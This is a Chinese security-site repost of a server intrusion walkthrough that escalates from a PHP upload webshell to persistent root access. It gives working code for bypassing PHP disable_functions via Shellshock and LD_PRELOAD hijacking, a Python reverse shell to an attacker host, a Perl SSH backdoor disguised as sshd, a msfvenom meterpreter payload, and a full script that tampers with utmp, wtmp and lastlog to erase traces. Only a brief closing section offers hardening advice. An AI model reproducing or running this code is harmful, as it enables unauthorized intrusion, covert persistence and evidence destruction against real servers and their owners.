安基网 首页 安全 渗透测试 查看内容

黑客渗透提权过程解析

2019-10-23 08:42| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 0x01 前言Getshell 的漏洞分析在:https://getpass.cn/2019/09/06/An-APP-distribution-system-upload-vulnerability/0x02 PHP Version 5.6.30disable_functions:passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openl

0x01 前言

Getshell 的漏洞分析在:

https://getpass.cn/2019/09/06/An-APP-distribution-system-upload-vulnerability/

0x02

PHP Version 5.6.30
disable_functions:
passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru
sendmail_path:/usr/sbin/sendmail -t -i
mysql: mysqlnd 5.0.11-dev - 20120503

0x03

# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions) 
# Google Dork: none
# Date: 10/31/2014
# Exploit Author: Ryan King (Starfall)
# Vendor Homepage: http://php.net
# Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
# Version: 5.* (tested on 5.6.2)
# Tested on: Debian 7 and CentOS 5 and 6
# CVE: CVE-2014-6271
function shellshock($cmd) { // Execute a command via CVE-2014-6271 @mail.c:283
$tmp = tempnam(".","data");
putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
// In Safe Mode, the user may only alter environment variableswhose names
// begin with the prefixes supplied by this directive.
// By default, users will only be able to set environment variablesthat
// begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive isempty,
// PHP will let the user modify ANY environment variable!
mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actuallysend any mail
$output = @file_get_contents($tmp);
@unlink($tmp);
if($output != "") return $output;
else return "No output, or not vuln.";
}
echo shellshock($_REQUEST["cmd"]);
?>

0x04

#define _GNU_SOURCE
#include
#include
#include
__attribute__ ((__constructor__)) void preloadme (void)
{
unsetenv("LD_PRELOAD");
const char* cmdline = getenv("EVIL_CMDLINE");
system(cmdline);
}

然后上传调用文件 php

 echo "

example: http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so

";
$cmd = $_GET["cmd"];
$out_path = $_GET["outpath"];
$evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
echo "

cmdline: " . $evil_cmdline . "

";
putenv("EVIL_CMDLINE=" . $evil_cmdline);
$so_path = $_GET["sopath"];
putenv("LD_PRELOAD=" . $so_path);
mail("", "", "", "");
echo "

output:
" . nl2br(file_get_contents($out_path)) . "

";
unlink($out_path);
?>

利用 unix 的LD_PRELOAD和 php 的putenv

#include
__attribute__((constructor)) void l3yx(){
unsetenv("LD_PRELOAD");
system(getenv("_evilcmd"));
}

利用 php 文件

putenv("_evilcmd=echo 1>/root/tmp/222222");
putenv("LD_PRELOAD=./evil.so");
mail('a','a','a','a');

执行后去刷新了一下目录,!!!!我去,成功了!

但是这样执行代码总是有众多不便的,比如没有回显,把命令带参数执行的时候会报错等

0x05

如果你是一个细心的人你会发现这里的 bypass_disablefunc.c(来自 github)和教程中提及的不一样,多出了使用for 循环修改 LD_PRELOAD 的首个字符改成 ,如果你略微了解 C 语言就会知道 是 C 语言字符串结束标记,原因注释里有:unsetenv("LD_PRELOAD") 在某些 Linux 发行版不一定生效(如 CentOS),这样一个小动作能够让系统原有的 LD_PRELOAD 环境变量自动失效

然后从环境变量 EVIL_CMDLINE 中接收 bypass_disablefunc.php 传递过来的待执行的命令行。

用命令:

gcc -shared -fPIC bypass_disablefunc.c -o bypass_disablefunc_x64.so

将 bypass_disablefunc.c 编译为共享对象 bypass_disablefunc_x64.so:

要根据目标架构编译成不同版本,在 x64 的环境中编译,若不带编译选项则默认为 x64,若要编译成 x86 架构需要加上 -m32 选项。

#define _GNU_SOURCE
#include
#include
#include
extern char** environ;
__attribute__ ((__constructor__)) void preload (void)
{
// get command line options and arg
const char* cmdline = getenv("EVIL_CMDLINE");
// unset environment variable LD_PRELOAD.
// unsetenv("LD_PRELOAD") no effect on some
// distribution (e.g., centos), I need crafty trick.
int i;
for (i = 0; environ[i]; ++i) {
if (strstr(environ[i], "LD_PRELOAD")) {
environ[i][0] = '';
}
}
// executive command
system(cmdline);
}

基本原理

前提是在 Linux 中已安装并启用 sendmail 程序。

php 的 mail() 函数在执行过程中会默认调用系统程序 /usr/sbin/sendmail,而 /usr/sbin/sendmail 会调用 getuid()。如果我们能通过 LD_PRELOAD 的方式来劫持 getuid(),再用 mail() 函数来触发 sendmail 程序进而执行被劫持的 getuid(),从而就能执行恶意代码了。

细化一下:

编写一个原型为 uid_t getuid(void); 的 C 函数,内部执行攻击者指定的代码,并编译成共享对象 evil.so;

运行 PHP 函数 putenv(),设定环境变量 LD_PRELOAD 为 evil.so,以便后续启动新进程时优先加载该共享对象;

运行 PHP 的 mail() 函数,mail() 内部启动新进程 /usr/sbin/sendmail,由于上一步 LD_PRELOAD 的作用,sendmail 调用的系统函数 getuid() 被优先级更好的 evil.so 中的同名 getuid() 所劫持;

达到不调用 PHP 的各种命令执行函数(system()、exec() 等等)仍可执行系统命令的目的。

#include 
#include
#include
int geteuid() {
const char* cmdline = getenv("EVIL_CMDLINE");
if (getenv("LD_PRELOAD") == NULL) { return 0; }
unsetenv("LD_PRELOAD");
system(cmdline);
}
gcc -shared -fPIC bypass.c -o byapss.so

0x06

可以执行命令了,执行上反弹 shell,有交互的 shell 舒服多了,这里用 python 的反弹脚本,一般系统有装 python 脚本,我都会先用 pyhton,因为有一些系统的不一样,bash 或者 nc 比较麻烦。

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("x.x.x.x",7777))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);

监听一波

反弹成功了

执行uname -a看了下版本

Linux cloud 2.6.32-642.el6.x86_64 #1 SMP Tue May 10 17:27:01 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

在自己的 Linux 环境编译然后上传到目标机子上面执行

去连 ssh 的时候有些管理员会把 ssh 的端口改了,用命令netstat -nlp就可以看到了。已经成功了,用户名为firefart密码是刚设置的 123456。

0x07

登陆目标机子后,记得及时恢复 /etc/passwd

cp /tmp/passwd.bak /etc/passwd

那些 pam 补丁、隐藏文件、suid、inetd 等都可以用作后门,看你环境。

1、这个 ssh 后门伪装成一个 perl 脚本,名为 sshd,位于 /usr/sbin/sshd , 将系统原先的 sshd 移到 /usr/bin 下

#!/usr/bin/perl
exec"/bin/sh"if(getpeername(STDIN)=~/^..zf/);
exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;

2、将真正的 sshd 移至 /usr/bin/sshd

mv /usr/sbin/sshd /usr/bin/sshd

3、将后门 sshd (perl 脚本移动至 /usr/sbin/sshd),并授予执行权限

chmod +x /usr/sbin/sshd

4、重启 ssh 服务

/etc/init.d/sshd restart

5、连接后门,记得安装好 socat

sudo yum install socat
#socat STDIO TCP4:目标ip:ssh端口一般是22,sourceport=31334
socat STDIO TCP4:127.0.0.1:22,sourceport=31334

0x08

当然做内网渗透必不可少的就是 msf 了,如果是 Windows 的话推荐使用CobaltStrike非常 nice 的一个工具。

1、先生成一个后门

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.79.132 LPORT=4455 -f elf > shell.elf

2、把 shell.elf 上传到目标机子上面运行

3、在本地执行监听

use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4455
exploit

4、执行后门反弹 Meterpreter 的会话

chmod +x ./shell.elf
./shell.elf

5、查看跳板机处于哪几个网段

run get_local_subnets

但是我这个是属于外网的机子,后来想了一下感觉都不是内网一点意思都没有。。。

0x09

走之后记得清理痕迹,以防被溯源或者被管理员发现了。下面附上一个脚本供大家使用:

import os, struct, sys
from pwd import getpwnam
from time import strptime, mktime
from optparse import OptionParser
UTMPFILE = "/var/run/utmp"
WTMPFILE = "/var/log/wtmp"
LASTLOGFILE = "/var/log/lastlog"
LAST_STRUCT = 'I32s256s'
LAST_STRUCT_SIZE = struct.calcsize(LAST_STRUCT)
XTMP_STRUCT = 'hi32s4s32s256shhiii4i20x'
XTMP_STRUCT_SIZE = struct.calcsize(XTMP_STRUCT)
def getXtmp(filename, username, hostname):
xtmp = ''
try:
fp = open(filename, 'rb')
while True:
bytes = fp.read(XTMP_STRUCT_SIZE)
if not bytes:
break
data = struct.unpack(XTMP_STRUCT, bytes)
record = [(lambda s: str(s).split("", 1)[0])(i) for i in data]
if (record[4] == username and record[5] == hostname):
continue
xtmp += bytes
except:
showMessage('Cannot open file: %s' % filename)
finally:
fp.close()
return xtmp
def modifyLast(filename, username, hostname, ttyname, strtime):
try:
p = getpwnam(username)
except:
showMessage('No such user.')
timestamp = 0
try:
str2time = strptime(strtime, '%Y:%m:%d:%H:%M:%S')
timestamp = int(mktime(str2time))
except:
showMessage('Time format err.')
data = struct.pack(LAST_STRUCT, timestamp, ttyname, hostname)
try:
fp = open(filename, 'wb')
fp.seek(LAST_STRUCT_SIZE * p.pw_uid)
fp.write(data)
except:
showMessage('Cannot open file: %s' % filename)
finally:
fp.close()
return True
def showMessage(msg):
print msg
exit(-1)
def saveFile(filename, contents):
try:
fp = open(filename, 'w+b')
fp.write(contents)
except IOError as e:
showMessage(e)
finally:
fp.close()
if __name__ == '__main__':
usage = 'usage: logtamper.py -m 2 -u b4dboy -i 192.168.0.188
logtamper.py -m 3 -u b4dboy -i 192.168.0.188 -t tty1 -d 2015:05:28:10:11:12'
parser = OptionParser(usage=usage)
parser.add_option('-m', '--mode', dest='MODE', default='1' , help='1: utmp, 2: wtmp, 3: lastlog [default: 1]')
parser.add_option('-t', '--ttyname', dest='TTYNAME')
parser.add_option('-f', '--filename', dest='FILENAME')
parser.add_option('-u', '--username', dest='USERNAME')
parser.add_option('-i', '--hostname', dest='HOSTNAME')
parser.add_option('-d', '--dateline', dest='DATELINE')
(options, args) = parser.parse_args()
if len(args) < 3:
if options.MODE == '1':
if options.USERNAME == None or options.HOSTNAME == None:
showMessage('+[Warning]: Incorrect parameter.')
if options.FILENAME == None:
options.FILENAME = UTMPFILE
# tamper
newData = getXtmp(options.FILENAME, options.USERNAME, options.HOSTNAME)
saveFile(options.FILENAME, newData)
elif options.MODE == '2':
if options.USERNAME == None or options.HOSTNAME == None:
showMessage('+[Warning]: Incorrect parameter.')
if options.FILENAME == None:
options.FILENAME = WTMPFILE
# tamper
newData = getXtmp(options.FILENAME, options.USERNAME, options.HOSTNAME)
saveFile(options.FILENAME, newData)
elif options.MODE == '3':
if options.USERNAME == None or options.HOSTNAME == None or options.TTYNAME == None or options.DATELINE == None:
showMessage('+[Warning]: Incorrect parameter.')
if options.FILENAME == None:
options.FILENAME = LASTLOGFILE
# tamper
modifyLast(options.FILENAME, options.USERNAME, options.HOSTNAME, options.TTYNAME , options.DATELINE)
else:
parser.print_help()

0x10

1、此次渗透的入口点还是目标站点的程序出现的上传漏洞,应该对程序的上传点做过滤加白名单。

2、其实宝塔的功能已经对 php 的执行命令的函数做了严格的封锁,但是还是有漏网之鱼,在宝塔禁用的函数基础上的 disable_function 里面加上putenv函数的禁用。

3、被用脏牛提权,这个是内核的漏洞,应该及时升级内核版本,执行以下命令,需要重启。

Centos/RHEL 更新

sudo yum update

Ubuntu/Debian 更新

sudo apt-get update && sudo apt-get dist-upgrade

4、如果被植入后门了

应该及时查应该及时查看和本机的连接情况,可以用 netstat 查看。

查看用户是否有改动, cat /etc/passwd 。

查看可疑进程 top

看和本机的连接情况,可以用 netstat 查看。

结束语:本人对计算机范畴的软件、网络、数据库等很有研究,如果你在写计算机论文方面有困难哪的话,可以与我沟通。



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6750531124537082376/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部